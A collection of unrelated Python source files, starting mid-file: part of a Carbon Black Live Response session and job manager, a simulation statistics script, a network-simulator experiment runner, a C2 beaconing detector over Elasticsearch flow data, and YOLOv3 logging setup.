# exiting the scheduler if we get None
# TODO: wait for all worker threads to exit
return
self._schedule_jobs()
def _schedule_jobs(self):
log.debug("Entering scheduler")
# First, see if there are new jobs to schedule on idle workers.
self._schedule_existing_workers()
# If we have jobs scheduled to run on devices with no current associated worker, let's spawn new ones.
if set(self._unscheduled_jobs.keys()) - self._idle_workers:
self._cleanup_idle_workers()
self._spawn_new_workers()
self._schedule_existing_workers()
def _cleanup_idle_workers(self, max=None):
if not max:
max = self._max_workers
for device in list(self._idle_workers)[:max]:
log.debug("asking worker for device id {0} to exit".format(device))
self._job_workers[device].job_queue.put(None)
def _schedule_existing_workers(self):
log.debug("There are idle workers for device ids {0}".format(self._idle_workers))
intersection = self._idle_workers.intersection(set(self._unscheduled_jobs.keys()))
log.debug("{0} jobs ready to execute in existing execution slots".format(len(intersection)))
for device in intersection:
item = self._unscheduled_jobs[device].pop(0)
self._job_workers[device].job_queue.put(item)
self._idle_workers.remove(item.device_id)
self._cleanup_unscheduled_jobs()
def _cleanup_unscheduled_jobs(self):
marked_for_deletion = []
for k in self._unscheduled_jobs.keys():
if len(self._unscheduled_jobs[k]) == 0:
marked_for_deletion.append(k)
for k in marked_for_deletion:
del self._unscheduled_jobs[k]
def submit_job(self, work_item):
"""
Submit a new job to be processed.
Args:
work_item (WorkItem): New job to be processed.
"""
self.schedule_queue.put(work_item)
def _spawn_new_workers(self):
if len(self._job_workers) >= self._max_workers:
return
from datetime import datetime, timedelta
now = datetime.utcnow()
delta = timedelta(minutes=60)
dformat = '%Y-%m-%dT%H:%M:%S.%fZ'
devices = [s for s in self._cb.select(Device)
if s.id in self._unscheduled_jobs and s.id not in self._job_workers
and now - datetime.strptime(s.last_contact_time, dformat) < delta] # noqa: W503
log.debug("Spawning new workers to handle these devices: {0}".format(devices))
for device in devices:
if len(self._job_workers) >= self._max_workers:
break
log.debug("Spawning new JobWorker for device id {0}".format(device.id))
self._job_workers[device.id] = JobWorker(self._cb, device.id, self.schedule_queue)
self._job_workers[device.id].start()
class CbLRManagerBase(object):
"""Live Response manager object."""
cblr_base = "" # override in subclass for each product
cblr_session_cls = NotImplemented # override in subclass for each product
def __init__(self, cb, timeout=30, keepalive_sessions=False, thread_pool_count=5):
"""
Initialize the CbLRManagerBase object.
Args:
cb (BaseAPI): The CBC SDK object reference.
timeout (int): Timeout to use for requests, in seconds.
keepalive_sessions (bool): If True, "ping" sessions occasionally to ensure they stay alive.
thread_pool_count (int): number of workers for async commands (optional)
"""
self._timeout = timeout
self._cb = cb
self._sessions = {}
self._session_lock = threading.RLock()
self._keepalive_sessions = keepalive_sessions
self._init_poll_delay = 1
self._init_poll_timeout = 360
self._async_executor = None
self._thread_pool_count = thread_pool_count
if keepalive_sessions:
self._cleanup_thread_running = True
self._cleanup_thread_event = threading.Event()
self._cleanup_thread = threading.Thread(target=self._session_keepalive_thread)
self._cleanup_thread.daemon = True
self._cleanup_thread.start()
self._job_scheduler = None
def _async_submit(self, func, *args, **kwargs):
"""
Submit a task to the executor, creating it if it doesn't yet exist.
Args:
func (func): A callable to be executed as a background task.
*args (list): Arguments to be passed to the callable.
**kwargs (dict): Keyword arguments to be passed to the callable.
Returns:
Future: A future object representing the background task, which will pass along the result.
"""
if not self._async_executor:
self._async_executor = ThreadPoolExecutor(max_workers=self._thread_pool_count)
return self._async_executor.submit(func, args, kwargs)
def submit_job(self, job, device):
"""
Submit a new job to be executed as a Live Response.
Args:
job (object): The job to be scheduled.
device (int): ID of the device to use for job execution.
Returns:
Future: A reference to the running job.
"""
if self._job_scheduler is None:
# spawn the scheduler thread
self._job_scheduler = LiveResponseJobScheduler(self._cb)
self._job_scheduler.start()
work_item = WorkItem(job, device)
self._job_scheduler.submit_job(work_item)
return work_item.future
def _maintain_sessions(self):
delete_list = []
with self._session_lock:
for session in iter(self._sessions.values()):
if not self._cleanup_thread_running:
break
if session._refcount == 0:
delete_list.append(session.device_id)
else:
try:
self._send_keepalive(session.session_id)
except ObjectNotFoundError:
log.debug("Session {0} for device {1} not valid any longer, removing from cache"
.format(session.session_id, session.device_id))
delete_list.append(session.device_id)
except Exception:
log.debug(("Keepalive on session {0} (device {1}) failed with unknown error, "
"removing from cache").format(session.session_id, session.device_id))
delete_list.append(session.device_id)
for device_id in delete_list:
self._close_session(self._sessions[device_id].session_id)
del self._sessions[device_id]
def _session_keepalive_thread(self):
log.debug("Starting Live Response scheduler cleanup task")
while self._cleanup_thread_running:
self._cleanup_thread_event.wait(self._timeout)
if self._cleanup_thread_running:
self._maintain_sessions()
log.debug("Ending Live Response scheduler cleanup task")
def stop_keepalive_thread(self):
"""Stops the keepalive thread."""
if self._keepalive_sessions:
self._cleanup_thread_running = False
self._cleanup_thread_event.set()
def request_session(self, device_id, async_mode=False):
"""
Initiate a new Live Response session.
Args:
device_id (int): The device ID to use.
Returns:
CbLRSessionBase: The new Live Response session.
"""
def _return_existing_session():
self._sessions[device_id]._refcount += 1
return session
def _get_session_obj():
_, session_data = self._wait_create_session(device_id, session_id)
session = self.cblr_session_cls(self, session_id, device_id, session_data=session_data)
return session
def _create_and_store_session():
session = _get_session_obj()
self._sessions[device_id] = session
return session
if self._keepalive_sessions:
with self._session_lock:
if device_id in self._sessions:
session = self._sessions[device_id]
if async_mode:
return session.session_id, self._async_submit(lambda arg, kwarg: _return_existing_session())
return _return_existing_session()
else:
session_id = self._create_session(device_id)
if async_mode:
return session_id, self._async_submit(lambda arg, kwarg: _create_and_store_session())
return _create_and_store_session()
else:
session_id = self._create_session(device_id)
if async_mode:
return session_id, self._async_submit(lambda arg, kwarg: _get_session_obj())
return _get_session_obj()
def close_session(self, device_id, session_id):
"""
Close the specified Live Response session.
Args:
device_id (int): ID of the device.
session_id (int): ID of the session.
"""
if self._keepalive_sessions:
with self._session_lock:
try:
self._sessions[device_id]._refcount -= 1
except KeyError:
pass
else:
self._close_session(session_id)
def _send_keepalive(self, session_id):
log.debug("Sending keepalive message for session id {0}".format(session_id))
self._cb.get_object("{cblr_base}/sessions/{0}/keepalive".format(session_id, cblr_base=self.cblr_base))
class LiveResponseSession(CbLRSessionBase):
"""Public face of the Live Response session object."""
def __init__(self, cblr_manager, session_id, device_id, session_data=None):
"""
Initializes the LiveResponseSession.
Args:
cblr_manager (LiveResponseSessionManager): Reference to the session manager.
session_id (str): The ID of this session.
device_id (int): The ID of the device (remote machine) we're connected to.
session_data (dict): Additional session data.
"""
super(LiveResponseSession, self).__init__(cblr_manager, session_id, device_id, session_data=session_data)
device_info = self._cb.select(Device, self.device_id)
self.os_type = OS_LIVE_RESPONSE_ENUM.get(device_info.os, None)
class LiveResponseSessionManager(CbLRManagerBase):
"""Session manager for Live Response sessions."""
cblr_base = "/appservices/v6/orgs/{}/liveresponse"
cblr_session_cls = LiveResponseSession
def __init__(self, cb, timeout=30, keepalive_sessions=False):
"""Initialize the LiveResponseSessionManager - only needed to format cblr_base"""
super(LiveResponseSessionManager, self).__init__(cb, timeout, keepalive_sessions)
self.cblr_base = self.cblr_base.format(cb.credentials.org_key)
def submit_job(self, job, device):
"""
Submit a job for execution by the job scheduler.
Args:
job (func): The job function to be executed.
device (object): The device ID or Device object the job will be executed on.
Returns:
Future: A Future that will allow waiting until the job is complete.
"""
if self._job_scheduler is None:
# spawn the scheduler thread
self._job_scheduler = LiveResponseJobScheduler(self._cb)
self._job_scheduler.start()
work_item = WorkItem(job, device)
self._job_scheduler.submit_job(work_item)
return work_item.future
def _get_or_create_session(self, device_id):
session_id = self._create_session(device_id)
return self._wait_create_session(device_id, session_id)
def session_status(self, session_id):
"""
Check the status of a lr session
Args:
session_id (str): The id of the session.
Returns:
str: Status of the session
"""
url = "{cblr_base}/sessions/{0}".format(session_id, cblr_base=self.cblr_base)
res = self._cb.get_object(url)
return res['status'].upper()
def _wait_create_session(self, device_id, session_id):
try:
res = poll_status(self._cb, "{cblr_base}/sessions/{0}".format(session_id,
cblr_base=self.cblr_base),
desired_status="ACTIVE", delay=self._init_poll_delay, timeout=self._init_poll_timeout)
except Exception:
# "close" the session, otherwise it will stay in a pending state
self._close_session(session_id)
# the Cb server will return a 404 if we don't establish a session in time, so convert this to a "timeout"
raise TimeoutError(uri="{cblr_base}/sessions/{0}".format(session_id, cblr_base=self.cblr_base),
message="Could not establish session with device {0}".format(device_id),
error_code=404)
else:
return session_id, res
def _close_session(self, session_id):
try:
self._cb.delete_object("{cblr_base}/sessions/{0}".format(session_id, cblr_base=self.cblr_base))
except Exception:
pass
def _create_session(self, device_id):
response = self._cb.post_object("{cblr_base}/sessions".format(cblr_base=self.cblr_base),
{"device_id": device_id}).json()
return response["id"]
class GetFileJob(object):
"""Object that retrieves a file via Live Response."""
def __init__(self, file_name):
"""
Initialize the GetFileJob.
Args:
file_name (str): The name of the file to be fetched.
"""
self._file_name = file_name
def run(self, session):
"""
Execute the file transfer.
Args:
session (CbLRSessionBase): The Live Response session being used.
Returns:
str: The contents of the file being retrieved.
"""
return session.get_file(self._file_name)
# TODO: adjust the polling interval and also provide a callback function to report progress
def poll_status(cb, url, desired_status="COMPLETE", timeout=None, delay=None):
"""
Poll the status of a Live Response query.
Args:
cb (BaseAPI): The CBC SDK object reference.
url (str): The URL to poll.
desired_status (str): The status we're looking for.
timeout (int): The timeout value in seconds.
delay (float): The delay between attempts in seconds.
Returns:
object: The result of the Live Response query that has the desired status.
Raises:
LiveResponseError: If an error response was encountered.
"""
start_time = time.time()
status = None
if not timeout:
timeout = 120
if not delay:
delay = 0.5
while status != desired_status and time.time() - start_time < timeout:
res = cb.get_object(url)
log.debug(f"url: {url} -> status: {res['status']}")
if res["status"].upper() == desired_status:
log.debug(json.dumps(res))
return res
elif res["status"].upper() == "ERROR":
raise LiveResponseError(res)
elif res["status"].upper() == "CANCELLED":
raise ApiError('The command has been cancelled.')
else:
time.sleep(delay)
raise TimeoutError(uri=url, message="timeout polling for Live Response")
|
generate_baseline_stats.py
|
"""Generate statistics for baseline"""
import numpy as np
import pickle
import click
import multiprocessing
time = np.arange(0.1, 50, 1)
sim_dt = 0.1
def gen_phase1(return_dict):
from buildup.fenics_.phase1 import phis, phie, cs, ce, j
return_dict["phase1_"] = {
"phis": phis.main(time=time, get_test_stats=True),
"phie": phie.main(time=time, get_test_stats=True),
"cs": cs.main(time=time, get_test_stats=True),
"ce": ce.main(time=time, get_test_stats=True),
"j": j.main(time=time, get_test_stats=True),
}
def gen_phase1t(return_dict):
from buildup.fenics_.phase1t import cs, ce
return_dict["phase1t_"] = {
"cs": cs.main(start_time=time[0], dt=sim_dt, stop_time=time[-1], plot_time=time, get_test_stats=True),
"ce": ce.main(start_time=time[0], dt=sim_dt, stop_time=time[-1], plot_time=time, get_test_stats=True),
}
def gen_phase2(return_dict):
from buildup.fenics_.phase2 import phis_newton, phie, cs, ce
return_dict["phase2_"] = {
"phis": phis_newton.main(time=time, dt=sim_dt, get_test_stats=True),
"phie": phie.main(time=time, dt=sim_dt, get_test_stats=True),
"cs": cs.main(time=time, dt=sim_dt, get_test_stats=True),
"ce": ce.main(time=time, dt=sim_dt, get_test_stats=True),
}
def gen_phase2t(return_dict):
from buildup.fenics_.phase2t import cs, ce
return_dict["phase2t_"] = {
"cs": cs.main(start_time=time[0], dt=sim_dt, stop_time=time[-1], plot_time=time, get_test_stats=True),
"ce": ce.main(start_time=time[0], dt=sim_dt, stop_time=time[-1], plot_time=time, get_test_stats=True),
}
@click.command()
@click.argument("path")
def main(path):
manager = multiprocessing.Manager()
return_dict = manager.dict()
jobs = [
multiprocessing.Process(target=gen_phase1, args=(return_dict,)),
multiprocessing.Process(target=gen_phase1t, args=(return_dict,)),
multiprocessing.Process(target=gen_phase2, args=(return_dict,)),
multiprocessing.Process(target=gen_phase2t, args=(return_dict,)),
]
for j in jobs:
j.start()
for j in jobs:
j.join()
d = dict(return_dict)
data = dict()
for k, v in d.items():
for k1, v1 in v.items():
data[k + k1] = v
data.update({"time": time, "sim_dt": sim_dt})
with open(path, "wb") as file:
pickle.dump(d, file)
pass
if __name__ == "__main__":
main()
|
run_experiments_verify.py
|
#!/usr/bin/python
import subprocess
import threading
import multiprocessing
import os
conf_str_incastN = '''init_cwnd: 2
max_cwnd: 30
retx_timeout: 450
queue_size: 10485760
propagation_delay: 0.0000002
bandwidth: 100000000000.0
queue_type: 6
flow_type: 6
num_flow: {0}
num_hosts: {4}
flow_trace: ./CDF_{1}.txt
cut_through: 0
mean_flow_size: 0
load_balancing: 0
preemptive_queue: 0
num_pctl: 10
big_switch: 1
num_agg_switches: 16
num_core_switches: 9
host_type: 1
traffic_imbalance: 0
traffic_pattern: 0
disable_veritas_cc: 1
disable_pkt_logging: 0
disable_cwnd_logging: 0
only_sw_queue: 0
mtu: 5120
load: 0.8
use_dynamic_load: 1
burst_load: 1.2
burst_size: {3}
priority_downgrade: 0
hardcoded_targets: 15,25
high_prio_lat_target: 10
target_expiration: 50000
downgrade_window: 20
expiration_count: 250
rtt_expiration: 0
use_random_jitter: 1
random_flow_start: 0
enable_initial_shift: 1
reauth_limit: 3
magic_trans_slack: 1.1
magic_delay_scheduling: 1
use_flow_trace: 0
smooth_cdf: 0
bytes_mode: 1
burst_at_beginning: 0
capability_timeout: 1.5
capability_resend_timeout: 9
capability_initial: 8
capability_window: 8
capability_window_timeout: 25
ddc: 0
ddc_cpu_ratio: 0.33
ddc_mem_ratio: 0.33
ddc_disk_ratio: 0.34
ddc_normalize: 2
ddc_type: 0
deadline: 0
schedule_by_deadline: 0
avg_deadline: 0.0001
capability_third_level: 1
capability_fourth_level: 0
magic_inflate: 1
interarrival_cdf: none
num_host_types: 13
permutation_tm: 0
flushing_coefficient: 10
early_pkt_in_highest_prio: 0
cc_delay_target: 10
qos_weights: 4,1
qos_ratio: {2}
'''
#qos_ratio = ['0,100', '10,90', '20,80', '30,70', '40,60', '50,50', '60,40', '70,30', '80,20', '90,10', '100,0']
qos_ratio = ['66.67,33.33', '69,21','82,18', '83.33,16.67', '75,25']
#qos_ratio = ['81,19', '83,17', '77,23', '90,10', '95,5', '100,0']
#qos_ratio = ['99,1']
#qos_ratio = ['50,50']
#qos_ratio = ['70,20,10']
#qos_ratio = ['10,20,70', '20,20,60', '30,20,50', '40,20,40', '50,20,30', '60,20,20', '70,20,10']
runs = ['incast']
#burst_size = [64,256]
burst_size = [10000]
#burst_size = [1,2,4,8,16,32,64,128,256,512]
traffic_size = [1]
## create the "./config" and "./result" by yourself :(
binary = 'coresim/simulator'
template = binary + ' 1 ./exp_config/conf_{0}{1}_{2}_D{3}_B{4}.txt > ./result/result_{0}{1}_{2}_D{3}_B{4}.txt'
cdf_temp = './CDF_{}.txt'
#cdf_RPC = ['uniform_4K', 'uniform_32K']
cdf_RPC = ['uniform_4K']
#cdf_RPC = ['write_req']
def getNumLines(trace):
out = subprocess.check_output('wc -l {}'.format(trace), shell=True)
return int(out.split()[0])
def run_exp(str, semaphore):
semaphore.acquire()
print template.format(*str)
subprocess.call(template.format(*str), shell=True)
semaphore.release()
threads = []
semaphore = threading.Semaphore(multiprocessing.cpu_count())
for r in runs:
for cdf in cdf_RPC:
for ratio in qos_ratio:
for burst in burst_size:
for N in traffic_size: # incast size or all-to-all size
num_flow = 1000000
# generate conf file
if r == 'incast':
conf_str = conf_str_incastN.format(num_flow, cdf, ratio, burst, N + 1)
else:
assert False, r
# Note modify the config dir name
confFile = "./exp_config/conf_{0}{1}_{2}_D{3}_B{4}.txt".format(r, N, cdf, ratio.replace(',', '_'), burst)
with open(confFile, 'w') as f:
#print confFile
f.write(conf_str)
threads.append(threading.Thread(target=run_exp, args=((r, N, cdf, ratio.replace(',', '_'), burst), semaphore)))
print '\n'
[t.start() for t in threads]
[t.join() for t in threads]
print 'finished', len(threads), 'experiments'
|
command_control.py
|
# coding: utf-8
import sys
from flare.tools.utils import bcolors
from flare.base.config import flareConfig
try:
import pandas as pd
except:
print("Please make sure you have pandas installed. pip -r requirements.txt or pip install pandas")
sys.exit(0)
try:
from elasticsearch import Elasticsearch, helpers
except:
print("Please make sure you have elasticsearch module installed. pip -r requirements.txt or pip install elasticsearch")
sys.exit(0)
from multiprocessing import Process, JoinableQueue, Lock, Manager
from flare.tools.iputils import private_check, multicast_check, reserved_check
from flare.tools.whoisip import WhoisLookup
import time
import warnings
import os
import datetime
import json
warnings.filterwarnings('ignore')
config_default = os.path.join(os.path.dirname(__file__), '..', '..', 'configs/elasticsearch.ini')
class elasticBeacon(object):
"""
Elastic Beacon is designed to identify periodic communication between
network communicatiors. Future updates will allow for dynamic fields to be passed in.
If you do not allow your elastic search server to communicate externally, you can setup an
ssh tunnel by using ssh -NfL 9200:localhost:9200 username@yourserver
Otherwise, you'll need to adjust es_host to the IP address that is exposed to elasticSearch.
"""
def __init__(self,
config_in=None,
min_occur=10,
min_percent=5,
window=2,
threads=8,
period=24,
min_interval=2,
es_host='localhost',
es_port=9200,
es_timeout=480,
es_index='logstash-flow-*',
kibana_version='4',
verbose=True,
debug=False):
"""
:param min_occur: Minimum number of triads to be considered beaconing
:param min_percent: Minimum percentage of all connection attempts that
must fall within the window to be considered beaconing
:param window: Size of window in seconds in which we group connections to determine percentage, using a
large window size can give inaccurate interval times, multiple windows contain all interesting packets,
so the first window to match is the interval
:param threads: Number of cores to use
:param period: Number of hours to locate beacons for
:param min_interval: Minimum interval betweeen events to consider for beaconing behavior
:param es_host: IP Address of elasticsearch host (default is localhost)
:param es_timeout: Sets timeout to 480 seconds
:param kibana_version: 4 or 5 (query will depend on version)
"""
#self.config_in = config_in
if config_in is not None:
try:
self.config = flareConfig(config_in)
self.es_host = self.config.get('beacon', 'es_host')
self.es_port = int(self.config.get('beacon', 'es_port'))
self.es_index = self.config.get('beacon', 'es_index')
self.MIN_OCCURRENCES = int(self.config.get('beacon','min_occur'))
self.MIN_PERCENT = int(self.config.get('beacon','min_percent'))
self.WINDOW = int(self.config.get('beacon','window'))
self.NUM_PROCESSES = int(self.config.get('beacon','threads'))
self.period = int(self.config.get('beacon','period'))
self.min_interval = int(self.config.get('beacon', 'min_interval'))
self.es_timeout = int(self.config.get('beacon','es_timeout'))
self.kibana_version = self.config.get('beacon','kibana_version')
self.beacon_src_ip = self.config.get('beacon','field_source_ip')
self.beacon_dest_ip = self.config.get('beacon', 'field_destination_ip')
self.beacon_destination_port = self.config.get('beacon', 'field_destination_port')
self.beacon_timestamp = self.config.get('beacon', 'field_timestamp')
self.beacon_flow_bytes_toserver = self.config.get('beacon', 'field_flow_bytes_toserver')
self.beacon_flow_id = self.config.get('beacon', 'field_flow_id')
self.beacon_event_type = self.config.get('beacon','event_type')
self.verbose = self.config.config.getboolean('beacon', 'verbose')
self.auth_user = self.config.config.get('beacon','username')
self.auth_password = self.config.config.get('beacon', 'password')
self.suricata_defaults = self.config.config.getboolean('beacon','suricata_defaults')
try:
self.debug = self.config.config.getboolean('beacon', 'debug')
except:
pass
except Exception as e:
print(('{red}[FAIL]{endc} Could not properly load your config!\nReason: {e}'.format(red=bcolors.FAIL, endc=bcolors.ENDC, e=e)))
sys.exit(0)
else:
self.es_host = es_host
self.es_port = es_port
self.es_index = es_index
self.MIN_OCCURRENCES = min_occur
self.MIN_PERCENT = min_percent
self.WINDOW = window
self.NUM_PROCESSES = threads
self.period = period
self.min_interval = min_interval
self.kibana_version = kibana_version
self.es_timeout = es_timeout
self.beacon_src_ip = 'src_ip'
self.beacon_dest_ip = 'dest_ip'
self.beacon_destination_port = 'dest_port'
self.beacon_timestamp = '@timestamp'
self.beacon_flow_bytes_toserver = 'bytes_toserver'
self.beacon_flow_id = 'flow_id'
self.beacon_event_type = 'flow'
self.verbose = verbose
self.suricata_defaults = False
self.ver = {'4': {'filtered': 'query'}, '5': {'bool': 'must'}}
self.filt = list(self.ver[self.kibana_version].keys())[0]
self.query = list(self.ver[self.kibana_version].values())[0]
self.debug = debug
self.whois = WhoisLookup()
self.info = '{info}[INFO]{endc}'.format(info=bcolors.OKBLUE, endc=bcolors.ENDC)
self.success = '{green}[SUCCESS]{endc}'.format(green=bcolors.OKGREEN, endc=bcolors.ENDC)
self.fields = [self.beacon_src_ip, self.beacon_dest_ip, self.beacon_destination_port, 'bytes_toserver', 'dest_degree', 'occurrences', 'percent', 'interval']
try:
_ = (self.auth_user, self.auth_password)
except AttributeError as e:
self.auth = None
try:
self.vprint('{info}[INFO]{endc} Attempting to connect to elasticsearch...'.format(info=bcolors.OKBLUE,
endc=bcolors.ENDC))
if self.auth == None:
self.es = Elasticsearch(self.es_host, port=self.es_port, timeout=self.es_timeout, verify_certs=False)
else:
self.es = Elasticsearch(self.es_host, port=self.es_port, timeout=self.es_timeout, http_auth=(self.auth_user, self.auth_password), verify_certs=False)
self.vprint('{green}[SUCCESS]{endc} Connected to elasticsearch on {host}:{port}'.format(green=bcolors.OKGREEN, endc=bcolors.ENDC, host=self.es_host, port=str(self.es_port)))
except Exception as e:
self.vprint(e)
raise Exception(
"Could not connect to ElasticSearch -- Please verify your settings are correct and try again.")
self.q_job = JoinableQueue()
self.l_df = Lock()
self.l_list = Lock()
self.high_freq = None
self.flow_data = self.run_query()
def vprint(self, msg):
if self.verbose:
print(msg)
def dprint(self, msg):
if self.debug:
print(("[DEBUG] " + str(msg)))
def hour_query(self, h, *fields):
"""
:param h: Number of hours to look for beaconing (recommend 24 if computer can support it)
:param fields: Retrieve only these fields -- example "src_ip", "dest_ip", "src_port", "dest_port"
:return:
"""
# Timestamp in ES is in milliseconds
NOW = int(time.time() * 1000)
SECONDS = 1000
MINUTES = 60 * SECONDS
HOURS = 60 * MINUTES
lte = NOW
gte = int(NOW - h * HOURS)
if self.es_index:
query = {
"query": {
self.filt: {
self.query: {
"query_string": {
"query": "*",
"analyze_wildcard": 'true'
}
},
"filter": [{
"bool": {
"must": [
{
"range": {
self.beacon_timestamp: {
"gte": gte,
"lte": lte,
"format": "epoch_millis"
}
}
}
],
"must_not": []
}
},
{"term": {"event_type": self.beacon_event_type}}
]
}
}
}
else:
query = {
"query": {
self.filt: {
self.query: {
"query_string": {
"query": "*",
"analyze_wildcard": 'true'
}
},
"filter": {
"bool": {
"must": [
{
"range": {
"timestamp": {
"gte": gte,
"lte": lte,
"format": "epoch_millis"
}
}
}
],
"must_not": []
}
}
}
}
}
if fields:
query["_source"] = list(fields)
self.dprint(query)
return query
def percent_grouping(self, d, total):
mx = 0
interval = 0
# Finding the key with the largest value (interval with most events)
mx_key = int(max(iter(list(d.keys())), key=(lambda key: d[key])))
mx_percent = 0.0
for i in range(mx_key - self.WINDOW, mx_key + 1):
current = 0
# Finding center of current window
curr_interval = i + int(self.WINDOW / 2)
for j in range(i, i + self.WINDOW):
if j in d:
current += d[j]
percent = float(current) / total * 100
if percent > mx_percent:
mx_percent = percent
interval = curr_interval
return interval, mx_percent
def run_query(self):
self.vprint("{info} Gathering flow data... this may take a while...".format(info=self.info))
FLOW_BYTES = self.beacon_flow_bytes_toserver
if self.suricata_defaults:
FLOW_BYTES = 'flow.' + FLOW_BYTES
query = self.hour_query(self.period, self.beacon_src_ip, self.beacon_dest_ip, self.beacon_destination_port,
self.beacon_timestamp, FLOW_BYTES, self.beacon_flow_id)
self.dprint(query)
resp = helpers.scan(query=query, client=self.es, scroll="90m", index=self.es_index, timeout="10m")
df = pd.DataFrame([rec['_source'] for rec in resp])
if len(df) == 0:
raise Exception("Elasticsearch did not retrieve any data. Please ensure your settings are correct inside the config file.")
self.dprint(df)
df['dest_port'] = df[self.beacon_destination_port].fillna(0).astype(int)
if 'flow' in df.columns:
df[self.beacon_flow_bytes_toserver] = df['flow'].apply(lambda x: x.get(self.beacon_flow_bytes_toserver))
df['triad_id'] = (df[self.beacon_src_ip] + df[self.beacon_dest_ip] + df[self.beacon_destination_port].astype(str)).apply(hash)
df['triad_freq'] = df.groupby('triad_id')['triad_id'].transform('count').fillna(0).astype(int)
self.high_freq = list(df[df.triad_freq > self.MIN_OCCURRENCES].groupby('triad_id').groups.keys())
return df
def find_beacon(self, q_job, beacon_list):
while not q_job.empty():
triad_id = q_job.get()
self.l_df.acquire()
work = self.flow_data[self.flow_data.triad_id == triad_id]
self.l_df.release()
work[self.beacon_timestamp] = pd.to_datetime(work[self.beacon_timestamp])
work[self.beacon_timestamp] = (work[self.beacon_timestamp].astype(int) / 1000000000).astype(int)
work = work.sort_values([self.beacon_timestamp])
work['delta'] = (work[self.beacon_timestamp] - work[self.beacon_timestamp].shift()).fillna(0)
work = work[1:]
d = dict(work.delta.value_counts())
for key in list(d.keys()):
if key < self.min_interval:
del d[key]
# Finding the total number of events
total = sum(d.values())
if d and total > self.MIN_OCCURRENCES:
window, percent = self.percent_grouping(d, total)
if percent > self.MIN_PERCENT and total > self.MIN_OCCURRENCES:
PERCENT = str(int(percent))
WINDOW = str(window)
SRC_IP = work[self.beacon_src_ip].unique()[0]
DEST_IP = work[self.beacon_dest_ip].unique()[0]
DEST_PORT = str(int(work[self.beacon_destination_port].unique()[0]))
BYTES_TOSERVER = work[self.beacon_flow_bytes_toserver].sum()
SRC_DEGREE = len(work[self.beacon_dest_ip].unique())
OCCURRENCES = total
self.l_list.acquire()
beacon_list.append([SRC_IP, DEST_IP, DEST_PORT, BYTES_TOSERVER, SRC_DEGREE, OCCURRENCES, PERCENT, WINDOW])
self.l_list.release()
q_job.task_done()
def find_beacons(self, group=True, focus_outbound=False, whois=True, csv_out=None, html_out=None, json_out=None):
for triad_id in self.high_freq:
self.q_job.put(triad_id)
mgr = Manager()
beacon_list = mgr.list()
processes = [Process(target=self.find_beacon, args=(self.q_job, beacon_list,)) for thread in
range(self.NUM_PROCESSES)]
# Run processes
for p in processes:
p.start()
# Exit the completed processes
for p in processes:
p.join()
beacon_list = list(beacon_list)
beacon_df = pd.DataFrame(beacon_list,
columns=self.fields).dropna()
beacon_df.interval = beacon_df.interval.astype(int)
beacon_df['dest_degree'] = beacon_df.groupby(self.beacon_dest_ip)[self.beacon_dest_ip].transform('count').fillna(0).astype(int)
self.vprint('{info} Calculating destination degree.'.format(info=self.info))
if whois:
self.vprint('{info} Enriching IP addresses with whois information'.format(info=self.info))
beacon_df['src_whois'] = beacon_df[self.beacon_src_ip].apply(lambda ip: self.whois.get_name_by_ip(ip))
beacon_df['dest_whois'] = beacon_df[self.beacon_dest_ip].apply(lambda ip: self.whois.get_name_by_ip(ip))
if focus_outbound:
self.vprint('{info} Applying outbound focus - filtering multicast, reserved, and private IP space'.format(info=self.info))
beacon_df = beacon_df[(beacon_df[self.beacon_src_ip].apply(private_check)) &
(~beacon_df[self.beacon_dest_ip].apply(multicast_check)) &
(~beacon_df[self.beacon_dest_ip].apply(reserved_check)) &
(~beacon_df[self.beacon_dest_ip].apply(private_check))]
if group:
self.vprint('{info} Grouping by destination group IP'.format(info=self.info))
if whois:
self.fields.insert(self.fields.index(self.beacon_dest_ip), 'dest_whois')
beacon_df = pd.DataFrame(beacon_df.groupby(self.fields).size())
beacon_df.drop(0, axis=1, inplace=True)
if csv_out:
self.vprint('{success} Writing csv to {csv_name}'.format(csv_name=csv_out, success=self.success))
beacon_df.to_csv(csv_out, index=False)
if html_out:
self.vprint('{success} Writing html file to {html_out}'.format(html_out=html_out, success=self.success))
beacon_df.to_html(html_out)
if json_out:
self.vprint('{success} Writing json file to {json_out}'.format(json_out=json_out, success=self.success))
now = datetime.datetime.now().isoformat()
beacon_df['timestamp'] = now
beacon_df['period'] = self.period
beacon_df['event_type'] = "beaconing"
beacons = beacon_df.to_dict(orient="records")
with open(json_out, 'a') as out_file:
for beacon in beacons:
out_file.write(json.dumps(beacon) + '\n')
return beacon_df
|
__init__.py
|
# YOLOv3 🚀 by Ultralytics, GPL-3.0 license
"""
Logging utils
"""
import os
import warnings
from threading import Thread
import pkg_resources as pkg
import torch
from torch.utils.tensorboard import SummaryWriter
from utils.general import colorstr, emojis
from utils.loggers.wandb.wandb_utils import WandbLogger
from utils.plots import plot_images, plot_results
from utils.torch_utils import de_parallel
LOGGERS = ('csv', 'tb', 'wandb') # text-file, TensorBoard, Weights & Biases
RANK = int(os.getenv('RANK', -1))
try:
import wandb
assert hasattr(wandb, '__version__') # verify package import not local dir
if pkg.parse_version(wandb.__version__) >= pkg.parse_version('0.12.2') and RANK in [0, -1]:
wandb_login_success = wandb.login(timeout=30)
if not wandb_login_success:
wandb = None
except (ImportError, AssertionError):
wandb = None
class Loggers():
# Loggers class
def __init__(self, save_dir=None, weights=None, opt=None, hyp=None, logger=None, include=LOGGERS):
self.save_dir = save_dir
self.weights = weights
self.opt = opt
self.hyp = hyp
self.logger = logger # for printing results to console
self.include = include
self.keys = ['train/box_loss', 'train/obj_loss', 'train/cls_loss', # train loss
'metrics/precision', 'metrics/recall', 'metrics/mAP_0.5', 'metrics/mAP_0.5:0.95', # metrics
'val/box_loss', 'val/obj_loss', 'val/cls_loss', # val loss
'x/lr0', 'x/lr1', 'x/lr2'] # params
for k in LOGGERS:
setattr(self, k, None) # init empty logger dictionary
self.csv = True # always log to csv
# Message
if not wandb:
prefix = colorstr('Weights & Biases: ')
s = f"{prefix}run 'pip install wandb' to automatically track and visualize YOLOv3 🚀 runs (RECOMMENDED)"
print(emojis(s))
# TensorBoard
s = self.save_dir
if 'tb' in self.include and not self.opt.evolve:
prefix = colorstr('TensorBoard: ')
self.logger.info(f"{prefix}Start with 'tensorboard --logdir {s.parent}', view at http://localhost:6006/")
self.tb = SummaryWriter(str(s))
# W&B
if wandb and 'wandb' in self.include:
wandb_artifact_resume = isinstance(self.opt.resume, str) and self.opt.resume.startswith('wandb-artifact://')
run_id = torch.load(self.weights).get('wandb_id') if self.opt.resume and not wandb_artifact_resume else None
self.opt.hyp = self.hyp # add hyperparameters
self.wandb = WandbLogger(self.opt, run_id)
else:
self.wandb = None
